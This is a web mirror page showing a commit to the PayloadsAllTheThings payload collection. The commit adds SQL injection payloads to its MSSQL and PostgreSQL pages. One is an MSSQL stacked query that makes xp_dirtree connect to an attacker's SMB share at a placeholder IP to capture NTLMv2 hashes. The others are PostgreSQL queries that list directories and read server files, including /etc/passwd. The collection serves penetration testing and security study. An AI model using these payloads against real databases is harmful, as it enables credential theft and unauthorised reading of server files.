weyne/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/weyne85/PayloadsAllTheThings.git synced 2025-10-29 16:57:02 +00:00
Code Issues Packages Projects Releases Wiki Activity

Jenkins Grrovy + MSSQL UNC + PostgreSQL list files

Browse Source
This commit is contained in:
Swissky
2019-02-17 20:02:16 +01:00
parent eac421432a
commit 78c882fb34
4 changed files with 46 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
SQL injection/MSSQL Injection.md
View File

@@ -137,6 +137,14 @@ EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```
## MSSQL UNC Path
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
```sql
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
```
## MSSQL Make user DBA (DB admin)
```sql

3
SQL injection/PostgreSQL Injection.md
View File

@@ -26,9 +26,12 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
## PostgreSQL File Read
```sql
select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200);
```
NOTE: ``pg_read_file` doesn't accept the `/` character.
```sql
CREATE TABLE temp(t TEXT);
COPY temp FROM '/etc/passwd';